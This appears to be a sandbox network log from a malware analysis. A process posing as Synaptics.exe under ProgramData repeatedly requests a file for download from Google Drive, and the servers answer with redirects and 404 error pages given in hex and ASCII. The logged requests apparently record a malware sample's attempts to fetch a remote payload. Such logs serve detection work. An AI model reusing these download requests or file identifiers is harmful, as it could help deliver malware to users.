                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
2024-12-30 03:59:12 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5TuCNmwWNgnO3Ttu6oyTnaLImnhSPrgxrURcHsDufdP4HkuKzkulSciAu0N-IOCIDeKCehem0
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:12 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-0Rjrrj_fZBEpdGAtUYZu8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:12 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:12 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="DHflwe-4DZqL3gVb_cMBFg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:12 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    15 | 192.168.2.4 | 49764 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:12 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:12 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:12 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-pB4tCtDlsl37CbPvO7RrNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    16 | 192.168.2.4 | 49770 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:12 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:13 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:13 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-_mN1Xz8SmpgEbz34mvmc9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    17 | 192.168.2.4 | 49771 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:12 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:13 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC772yqfX8Vr5PZ9SaTmSETjHJBgBiIW4lhiJ3m8XvdntdiNiMoKdtQtndz0ZVgXb28C
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:13 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-1q2Qaz1c3vKaqdJrVWPd4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:13 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:13 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="uPQxelQqibhK5tB3TOAyWQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:13 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    18 | 192.168.2.4 | 49769 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:12 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:13 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5mvV9VDPvfV3q3htwd_TzHuW1v6YcOl-HmwABmrmLmMrJN2BMZF-0_LSKkFwQa3hWO
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:13 GMT
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-NKTiXMR5I4kFECjrCqQ4iA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:13 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:13 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="lvvl3Hj6fCS3WJd8D-r2gA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:13 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    19 | 192.168.2.4 | 49772 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:12 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:13 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:13 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-FC1KxSWsj8QIMlZI4LPClg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    20 | 192.168.2.4 | 49776 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:13 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    21 | 192.168.2.4 | 49777 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:13 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    22 | 192.168.2.4 | 49778 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:13 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    23 | 192.168.2.4 | 49779 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:13 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    24 | 192.168.2.4 | 49782 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:14 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:15 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:14 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-l1T-YZRNs1zO_DVgPmmyXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    25 | 192.168.2.4 | 49781 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:14 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:15 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:14 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ibNcj7Ed7u9YVEf67NFsEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
